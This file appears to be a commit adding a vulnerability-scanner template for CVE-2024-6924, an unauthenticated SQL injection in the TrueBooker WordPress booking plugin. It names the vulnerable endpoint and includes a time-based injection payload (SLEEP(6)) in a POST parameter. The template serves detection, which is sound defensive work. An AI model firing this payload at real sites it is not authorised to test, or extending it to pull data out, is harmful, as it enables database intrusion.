add CVE-2024-6924

patch-11
Kazgangap 2024-09-05 15:57:43 +03:00
parent 4909296b11
commit c475ac63d7
1 changed files with 53 additions and 0 deletions

View File

@ -0,0 +1,53 @@
id: CVE-2024-6924
info:
name: TrueBooker <= 1.0.2 - SQL Injection
author: s4e-io
severity: critical
description: |
The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking/truebooker-102-unauthenticated-sql-injection
- https://wpscan.com/vulnerability/39e79801-6ec7-4579-bc6b-fd7e899733a8/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-6924
metadata:
vendor: themetechmount
product: truebooker
framework: wordpress
publicwww-query: "/wp-content/plugins/truebooker-appointment-booking"
tags: wpscan,cve,cve2024,sqli,wp-plugin,wordpress
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/truebooker-appointment-booking/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"TrueBooker - Appointment Booking and Scheduler Plugin")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
@timeout 20s
POST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
tba_service_id=(SLEEP(6))
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
condition: and